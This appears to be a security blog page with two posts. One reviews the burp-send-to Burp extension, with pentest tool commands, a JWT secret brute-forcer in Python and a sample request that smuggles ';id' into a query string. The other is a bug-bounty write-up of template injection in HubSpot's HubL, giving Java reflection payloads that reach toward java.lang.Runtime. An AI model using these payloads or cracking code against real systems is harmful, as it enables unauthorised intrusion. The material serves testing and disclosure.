{ Better } Hacker: "I don't believe you have to be better than everybody else. I believe you have to be better than you ever thought you could be."
The Burp Extension No One Told You About (published 2021-01-02, updated 2021-02-07)<p><span style="font-family: inherit;">Some time last year, I came across a Burp extension on Github that replicates the <a href="https://www.zaproxy.org/docs/desktop/addons/invoke-applications/" rel="noopener noreferrer" target="_blank">Invoke Applications</a> functionality of OWASP ZAP inside Burp. Since discovering it, the extension has become a very big part of my Burp workflow and is probably one of the first extensions I install on a fresh Burp. Surprisingly, I haven't seen anyone else using it, and the Github project seems rather unknown to most people as well.</span></p><p><span style="font-family: inherit;">The extension I am talking about is "<a href="https://github.com/bytebutcher/burp-send-to" rel="noopener noreferrer" target="_blank">burp-send-to</a>" by "bytebutcher".
</span></p><p><span style="font-family: inherit;">PS: <strike>I couldn't find the original author of the extension on Twitter, if you know "bytebutcher", please reach out to me so that I can say thank you for their work on this and update their contact info. </strike></span>Bytebutcher contacted me via email :) Follow him on <a href="https://twitter.com/bytebutcher" rel="nofollow" target="_blank">twitter</a> and keep an eye for more awesome projects on his <a href="https://github.com/bytebutcher" rel="nofollow" target="_blank">Github</a></p><p><span style="font-family: inherit;">Lets see what this extension is all about!</span></p><p><strong>Core Idea</strong></p><p>
</p><p>If you use Burp Suite regularly, you are probably familiar with sending requests from one Burp tool to another. However, if you want to run an external tool, e.g. sqlmap or ffuf, against an interesting endpoint, there is no native way of handing the request contents to that tool. You have to either copy the URL or save the request to a file and then run the tool yourself.</p>
<p>With "burp-send-to" (I will refer to the extension simply as "SendTo" from now on), you can invoke any external tool that you want with a predefined command. You can also pass any part of the request or response to the tool by using placeholders.</p><p><strong>Installation</strong></p>
<p>The SendTo extension can be downloaded from <a href="https://github.com/bytebutcher/burp-send-to" target="_blank">Github</a> as a jar file and installed by importing it into Burp (Extender &gt; Extensions &gt; Add). The extension is also available in Burp's BApp Store, but at the time of writing the BApp Store version is older than the Github release.</p>
<p><strong>Usage</strong></p>
<p>The extension creates a new "SendTo" tab that ships with a few sample commands to show how the extension is used. On this tab you define and manage your own commands.</p><p>The following placeholders can be used within your commands:</p>
<ul>
<li><strong>%H:</strong> will be replaced with the host</li>
<li><strong>%P:</strong> will be replaced with the port</li>
<li><strong>%T:</strong> will be replaced with the protocol</li>
<li><strong>%U:</strong> will be replaced with the url</li>
<li><strong>%A:</strong> will be replaced with the url path</li>
<li><strong>%Q:</strong> will be replaced with the url query</li>
<li><strong>%C:</strong> will be replaced with the cookies</li>
<li><strong>%M:</strong> will be replaced with the HTTP-method</li>
<li><strong>%S:</strong> will be replaced with the selected text</li>
<li><strong>%F:</strong> will be replaced with the path to a temporary file containing the selected text</li>
<li><strong>%R:</strong> will be replaced with the path to a temporary file containing the content of the focused request/response</li>
<li><strong>%E:</strong> will be replaced with the path to a temporary file containing the header of the focused request/response</li>
<li><strong>%B:</strong> will be replaced with the path to a temporary file containing the body of the focused request/response</li>
</ul><p>For example, if you normally run sqlmap against any interesting URL, you can define the sqlmap command as:</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><pre style="text-align: left;"><code class="language-bash"><span style="font-family: courier;">sqlmap -u %U -f --dbs</span></code></pre></blockquote><p>Keep in mind that the substituted values (URL, query string, cookies, selected text) originate from the target and end up on a command line that your terminal runs. Check how your terminal command splits that line, quote the placeholders where your shell would otherwise interpret characters such as <code>&amp;</code>, <code>;</code> or <code>$</code>, and prefer the file placeholders (%R, %F, %E, %B) for anything that may contain shell metacharacters.</p><p>
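</p><p>To make the placeholder mechanism concrete, here is an added example (my own illustration in Python, not code from burp-send-to) of what such an expansion looks like: it parses a raw request into the host, port, URL, path, query, cookies and method that the placeholders refer to, writes the file placeholders to temp files, and shell-quotes every value in a single pass. The sample requests are constructed, and the quoting is an assumption about what a safe implementation should do, not a description of how the extension itself does it.</p>

```python
import re
import shlex
import tempfile

# Constructed sample request (not captured from any real target).
SAMPLE_REQUEST = (
    "GET /api/items?id=7&sort=name HTTP/1.1\r\n"
    "Host: shop.example.com:8443\r\n"
    "Cookie: session=abc123; theme=dark\r\n"
    "User-Agent: demo\r\n"
    "\r\n"
)

# Constructed request whose query string carries a shell metacharacter,
# to show why substituted values must be quoted before a shell sees them.
HOSTILE_REQUEST = "GET /x?q=a;id HTTP/1.1\r\nHost: example.com\r\n\r\n"


def parse_request(raw: str, tls: bool = True) -> dict:
    """Split a raw HTTP request into the pieces the SendTo placeholders expose."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    host_header = headers.get("host", "")
    host, _, port = host_header.partition(":")
    proto = "https" if tls else "http"
    path, _, query = target.partition("?")
    return {
        "method": method,
        "host": host,
        "port": port or ("443" if tls else "80"),
        "proto": proto,
        "url": f"{proto}://{host_header}{target}",
        "path": path,
        "query": query,
        "cookies": headers.get("cookie", ""),
        "headers": head + "\r\n",
        "body": body,
        "raw": raw,
    }


def _tmpfile(content: str) -> str:
    """Write content to a temp file and return its path (what %F/%R/%E/%B expand to)."""
    # newline="" keeps the CRLF line endings of the raw request intact.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False, newline="") as f:
        f.write(content)
        return f.name


PLACEHOLDER = re.compile(r"%[HPTUAQCMSFREB]")


def expand(command: str, req: dict, selected: str = "") -> str:
    """Expand SendTo-style placeholders in one pass, shell-quoting every value.

    A single regex pass matters: replacing %U first and then %A would also
    rewrite a literal "%A" that happens to sit inside a URL-encoded value.
    """
    values = {
        "%H": req["host"], "%P": req["port"], "%T": req["proto"], "%U": req["url"],
        "%A": req["path"], "%Q": req["query"], "%C": req["cookies"],
        "%M": req["method"], "%S": selected,
    }
    files = {"%F": selected, "%R": req["raw"], "%E": req["headers"], "%B": req["body"]}

    def substitute(match):
        key = match.group(0)
        if key in files:
            return shlex.quote(_tmpfile(files[key]))
        return shlex.quote(values[key])

    return PLACEHOLDER.sub(substitute, command)
```

<p>With the hostile request, <code>expand("tool %Q", ...)</code> yields <code>tool 'q=a;id'</code>: the semicolon stays inside the argument instead of terminating the command. Without the quoting, the query string would be split by the shell exactly as the target intended.</p><p>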
</p><p>The extension adds a right-click context menu "Send to..." for sending the request/response to the appropriate tool. So once you have identified an interesting request, simply right-click on it and choose the command you wish to execute from the "Send to" menu.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://raw.githubusercontent.com/bytebutcher/burp-send-to/master/images/burp-send-to-extension-intro.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="497" data-original-width="662" src="https://raw.githubusercontent.com/bytebutcher/burp-send-to/master/images/burp-send-to-extension-intro.png" /></a></div><p>By default, the extension is configured to use xterm to run the commands. You can change this to any terminal you like. I use KDE, so I have defined the terminal command as:</p><p>
</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><pre style="text-align: left;"><code class="language-bash"><span style="font-family: courier;">konsole --hold -e %C</span></code></pre></blockquote><p><strong>Interesting use cases</strong></p><p></p><ol>
<li>ffuf with custom wordlist:</li>
</ol><p>I normally run ffuf with a wordlist using the following command:</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><p style="text-align: left;"><code><span style="font-family: courier;">ffuf -u &lt;URL&gt; -w wordlist -recursion -v -fs 0 -ac</span></code></p></blockquote><p>I have defined this in SendTo as:</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><pre style="text-align: left;"><code class="language-bash"><span style="font-family: courier;">/path/to/ffuf -u %U -w /path/to/wordlist -recursion -v -fs 0 -ac</span></code></pre></blockquote><p>Caveat: ffuf needs the FUZZ keyword somewhere in the URL, so first send the request to Repeater, replace the part you want to fuzz with FUZZ, and only then invoke ffuf through SendTo from the Repeater tab.</p><ol start="2">
<li>gospider authenticated crawling</li>
</ol><p>A very useful feature of <a href="https://github.com/jaeles-project/gospider">gospider</a> is its ability to take the headers of a raw HTTP request via the <code>--burp</code> flag. This allows gospider to crawl the authenticated parts of an application without providing credentials or doing weird auth recording routines that never work (looking at you Portswigger!)</p><p>I have defined this in SendTo as:</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><pre style="text-align: left;"><code class="language-bash"><span style="font-family: courier;">gospider --site %U --burp %R --concurrent 10 --depth 3 -o /tmp/ --proxy http://127.0.0.1:8080</span></code></pre></blockquote><p>This command invokes gospider on the selected URL and passes the whole raw request (headers included) as a file, so that gospider can extract the headers and cookies and perform an authenticated crawl. The <code>--proxy</code> option sends gospider's traffic back through Burp's default listener, so everything it discovers lands in Proxy history and the site map.</p><ol start="3">
<li>Hashcat to crack JWT</li>
</ol><p>Want to send a JWT to hashcat for cracking?</p><p>Just select the token and invoke SendTo with the following command:</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><pre style="text-align: left;"><code class="language-bash"><span style="font-family: courier;">hashcat %F -m 16500 -a 3 -w 2 ?a?a?a?a?a</span></code></pre></blockquote><p>%F writes the selected token to a temporary file, which hashcat reads as its hash list; -m 16500 is hashcat's JWT mode and -a 3 runs a mask attack, here every combination of five printable characters (?a). This only recovers the secret of HMAC-signed tokens such as HS256; RS256 or ES256 tokens are signed with a private key that no mask attack will find, so check the alg in the header first. Adjust the mask, or switch to -a 0 with a wordlist, to match the secrets you expect.</p><ol start="4">
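</ol><p>As an added illustration of what that hashcat command is actually doing (this is my own Python, not part of the original post or of hashcat): the script below builds an HS256 token with a known short secret and recovers it by mask-style brute force over "header.payload", refusing tokens whose header names a non-HMAC algorithm. The secret, payload and charset are constructed for the demo; hashcat does the same HMAC comparison, only on a GPU and with a much bigger keyspace.</p>

```python
import base64
import hashlib
import hmac
import itertools
import json
import string

ALGS = {"HS256": hashlib.sha256, "HS384": hashlib.sha384, "HS512": hashlib.sha512}


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_jwt(payload: dict, secret: bytes, alg: str = "HS256") -> str:
    """Build an HMAC-signed JWT; used here only to manufacture a test token."""
    header = b64url_encode(json.dumps({"alg": alg, "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{header}.{body}".encode()
    signature = hmac.new(secret, signing_input, ALGS[alg]).digest()
    return f"{header}.{body}.{b64url_encode(signature)}"


def hmac_digest_for(token: str):
    """Return the hash constructor for an HMAC-signed token, or None when the
    token is not HMAC-signed (RS*/ES*/PS*/none: there is no secret to brute-force)."""
    header = json.loads(b64url_decode(token.split(".")[0]))
    return ALGS.get(header.get("alg"))


def crack_jwt(token: str, charset: str = string.ascii_lowercase + string.digits, max_len: int = 3):
    """Mask-style brute force of the signing secret: every candidate is fed
    through HMAC over "header.payload" and compared with the token's signature.
    Returns the secret as a string, or None if it is not found within max_len."""
    digestmod = hmac_digest_for(token)
    if digestmod is None:
        return None
    header, body, signature = token.split(".")
    signing_input = f"{header}.{body}".encode()
    target = b64url_decode(signature)
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            candidate = "".join(combo).encode()
            if hmac.new(candidate, signing_input, digestmod).digest() == target:
                return candidate.decode()
    return None
```

<p>The check in <code>hmac_digest_for</code> is the step worth keeping even when you hand the real work to hashcat: a token signed with RS256 looks identical on the wire, and a mask attack against it burns GPU time for nothing.</p><ol start="4">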
<li>smuggler</li>
</ol><p>We all know the HTTP Request smuggler extension is great, but still want to execute the awesome <a href="https://github.com/defparam/smuggler" target="_blank">smuggler.py</a> script on a URL?</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><pre style="text-align: left;"><code class="language-bash"><span style="font-family: courier;">python /path/to/smuggler/smuggler.py -u %U</span></code></pre></blockquote><p>You can even select multiple URLs in Proxy history and send them all at once to any tool. You can also control whether the tool executes in parallel or in sequential fashion when multiple items are sent to a tool.</p><ol start="5">
<li>Brute force numeric parameter with ffuf</li>
</ol><p>A more advanced use requires some command-line fu but opens up a lot of possibilities given the limitless potential of the command line. With the following command, you can brute-force a numeric parameter using ffuf without ever leaving Burp:</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><pre style="text-align: left;"><code class="language-bash"><span style="font-family: courier;">bash -c "seq -w 0 5 | ffuf --request %R -w -:FUZZ"</span></code></pre></blockquote><p>Here seq generates the numbers from 0 to 5 (change the range as per your requirements) and pipes them to ffuf, which reads its wordlist from stdin (<code>-w -</code>) and binds it to the FUZZ keyword. As with the earlier ffuf example, the request file passed via %R must already contain FUZZ where the parameter value goes, so edit the request in Repeater first.</p><p>In my experience, ffuf performs at least 10x faster than Burp Intruder.</p><p>We can probably replace Burp Intruder completely by replicating its functionality with ffuf through tricks like the one above. Maybe a topic for another blog post ;)</p><p>As you can see, the extension adds powerful capabilities to Burp and offers limitless possibilities for improving your workflow.</p><p><strong>Wishlist</strong></p><p>Despite all the wonderful features it already has, I wish the author would add a couple more to make it even better:</p><p>
</p><ol>
<li>
<p>Automatic execution</p>
<p>Imagine you want to execute a particular tool on every request and response going through Burp while also passing relevant parts to the tool.</p>
<p><a href="https://github.com/silentsignal/burp-piper" target="_blank">Piper</a> can do this to some extent but I haven't figured out how to pass request contents to the tool.</p>
</li>
<li>
<p>Passing multiple inputs as single file</p>
<p>This seems pretty easy to implement: something like selecting multiple URLs and passing all of them to a tool as a single file. Currently you can only pass the selected URLs directly on the command line.</p>
</li>
</ol><p></p><p>All in all, this is a wonderful little gem of an extension; kudos to bytebutcher for the excellent work. Try it out and let me know how you are using it. Follow me on <a href="https://twitter.com/fyoorer" target="_blank">twitter</a> for more such application security tidbits ;)</p><p></p>RCE in Hubspot with EL injection in HubL (published 2018-12-07)<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">This is the story of how I was able to get remote code execution on <a href="https://www.hubspot.com/" target="_blank">Hubspot</a>'s servers by exploiting a vulnerability in <a href="https://designers.hubspot.com/docs/hubl/intro-to-hubl" target="_blank">HubL expression language</a>, which is used for creating templates and custom modules within the Hubspot CRM. I had absolutely no experience with these kinds of vulnerabilities before and it turned out to be a very interesting learning opportunity. In this post, I go through the process I followed while researching and how little pieces were connected together to achieve a much bigger goal. </span><br />
<div>
<h4 style="text-align: left;">
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Getting started</span></h4>
</div>
<div>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">While working on the Hubspot's bugbounty program, I came across a functionality which looked very interesting. Users can create custom designs for emails or blogs from the design manager and can use HubL expression language in their templates.</span></div>
<div>
</div>
<div>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Because HubL is a markup language, I began with the payload {{7*7}} and got a nice '49' back which means the server was treating anything within two curly brackets as HubL code. </span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Bear in mind, at this point I didn't know anything about expression languages or HubL so I decided to fuzz the input and see what template engine is being used at server side by following the method posted at PortSwigger <a href="https://portswigger.net/blog/server-side-template-injection" target="_blank">blog</a></span><br />
<h3 style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-8DC50fPWy04/XAl_iDznbrI/AAAAAAAAUNs/FE2SgSu0lo4UOvY26QQjvpAJY9Pi5UGywCLcBGAs/s1600/template-identify.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="386" data-original-width="640" height="241" src="https://3.bp.blogspot.com/-8DC50fPWy04/XAl_iDznbrI/AAAAAAAAUNs/FE2SgSu0lo4UOvY26QQjvpAJY9Pi5UGywCLcBGAs/s400/template-identify.png" width="400" /></a></h3>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Interestingly the output didn't follow any known pattern and I reached "Unknown" or "Not Vulnerable". Giving up after a few tries is lame, so I decided it was time to <a href="https://designers.hubspot.com/docs/hubl/hubl-module-syntax-and-parameters" target="_blank">RTFM</a>!</span><br />
<br />
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"> HubL Intro:</span></b><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">This is a very high level intro to HubL expression language and I am by no means an expert. The following section contains just enough information to understand what was happening and how I exploited the bug.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">The following 3 types of delimiters are used to separate HubL and HTML within the module's code.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">{% %} - statement delimiters</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br />HubL statements are used to create editable modules, define conditional template logic, set up for loops, define variables, and more.</span></div>
<div>
<br /></div>
<span style="font-family: "courier new" , "courier" , monospace;">{{ }} - expression delimiters </span><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Anything between expression delimiters {{ }} will be evaluated by the templating engine, and thats what I was more interested in.</span><br />
<div>
<br /></div>
<span style="font-family: "courier new" , "courier" , monospace;">{# #} - comment delimiters</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Anything between the {# #} will be commented out or ignored by the parser.</span><br />
<div>
<div style="text-align: left;">
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Variables:</span><br />
<br />
<div style="text-align: left;">
<div style="text-align: left;">
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">There are some built in variables such as<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"> </span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">{{ </span>account }}, {{ company_domain }}, {{ content }} </span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">etc</span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"> which can be used within a module. The parser replaces these variables with their actual values at runtime. </span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">e.g. </span></span><span style="font-family: "courier new" , "courier" , monospace;">{{ company_domain }} </span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">will be replaced by Your Company's domain name. Users can also declare custom variables within statement {% %} blocks and these can be used within expression {{ }} blocks just like built-in variables.</span></span></div>
</div>
</div>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Another interesting thing to note here is that the documentation says HubL is based on Jinja but as observed before, the output wasn't following normal Jinja pattern when evaluating the expressions. </span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Let the hacking begin!</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">For all below examples, the payload was submitted in </span><span style="font-family: "courier new" , "courier" , monospace;">template_source</span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"> parameter in the POST request and its output was seen in </span><span style="font-family: "courier new" , "courier" , monospace;">output_html</span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"> & </span><span style="font-family: "courier new" , "courier" , monospace;">html</span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"> fields.</span><br />
<h4 style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-QghAw7ZcKvo/XAm45e3miFI/AAAAAAAAUOA/tN1PYwIOcoUWMGDcy4QA306ZSoWgqPp2ACLcBGAs/s1600/response.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="640" data-original-width="828" height="246" src="https://2.bp.blogspot.com/-QghAw7ZcKvo/XAm45e3miFI/AAAAAAAAUOA/tN1PYwIOcoUWMGDcy4QA306ZSoWgqPp2ACLcBGAs/s320/response.png" width="320" /></a></h4>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">After trying most of the built in variable names, I stumbled upon an undocumented variable: "request" which returned an interesting string.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload</span>: <span style="font-family: "courier new" , "courier" , monospace;">{{ request }}</span></div>
<div>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output:</span><span style="font-family: "courier new" , "courier" , monospace;"> com.hubspot.content.hubl.context.TemplateContextRequest@23548206</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Nice! This looks like the memory location of the 'request' object! And it also looked like Java from the naming convention. After some Google searches, I tried the following payloads to verify if its a Java based template engine:</span><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Convert a string to upper case -</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{'a'.toUpperCase()}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">A</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Concatenate two characters - </span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload:</span><span style="font-family: "courier new" , "courier" , monospace;"> {{'a'.concat('b')}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">ab</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Awesome! This looked very promising. The template engine not only parses its own syntax, it also allows us to call built-in methods. </span><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><b> The Vulnerability </b></span><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Trying to get the class of a character - </span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{'a'.getClass()}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">java.lang.String</span><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Excellent! Java is confirmed! The vulnerability here is that it was possible to call the getClass() method on any object. </span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">At this point I was sure this could be exploited to something bigger. </span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">But before shooting for the moon, I wanted to understand how expression language works so I started by gathering more information:</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Get class of the request object -</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{request.getClass()}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">class com.hubspot.content.hubl.context.TemplateContextRequest</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Get declared methods of a class ( increment from 0 to any number to get all the methods)</span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">- </span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{request.getClass().getDeclaredMethods()[0]}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">public boolean com.hubspot.content.hubl.context.TemplateContextRequest.isDebug()</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">At this point, I searched for "</span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">com.hubspot.content.hubl.context.TemplateContextRequest" and discovered the <a href="https://github.com/HubSpot/jinjava/" target="_blank">Jinjava project on Github</a>.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Looking at the class declaration in the source, I was also able to call methods from the request class - </span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{request.isDebug()}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">false</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">To take it a step further, I learnt that you can use the forName() and newInstance() methods to get an instance of a completely different class -</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Using string 'a' to get an instance of class </span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">sun.misc.Launcher -</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{'a'.getClass().forName('sun.misc.Launcher').newInstance()}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">sun.misc.Launcher@715537d4</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">It is also possible to get a new object of the Jinjava class -</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{'a'.getClass().forName('com.hubspot.jinjava.JinjavaConfig').newInstance()}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">com.hubspot.jinjava.JinjavaConfig@78a56797</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">It was also possible to call methods on the created object by combining the {% %} and {{ }} blocks -</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{% set ji='a'.getClass().forName('com.hubspot.jinjava.Jinjava').newInstance().newInterpreter() %}{{ji.render('{{1*2}}')}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Here, I created a variable 'ji' with new instance of </span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">com.hubspot.jinjava.Jinjava class and obtained reference to the newInterpreter method.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">In the next block, I called the render method on 'ji' with expression {{1*2}}.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">2</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Jinjava Inception!</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">I now had enough understanding and was ready to get the coveted remote code execution. From what I'd read, that should be easy. Just create an object of java.lang.Runtime class and call the exec() method on it. So....</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{'a'.getClass().forName('java.lang.Runtime').newInstance()}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">TemplateSyntaxException: java.lang.IllegalAccessException: Class javax.el.BeanELResolver can not access a member of class java.lang.Runtime with modifiers "private"</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Bummer! Looks like Runtime is blocked. To make sure I am not missing anything, I tried getting the declared methods of the Runtime class with getDeclaredMethods call and it worked fine, meaning that calling the newInstance() method on java.lang.Runtime class was not allowed. </span><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Knowing Java's history, I was pretty sure there will be another way.</span><br />
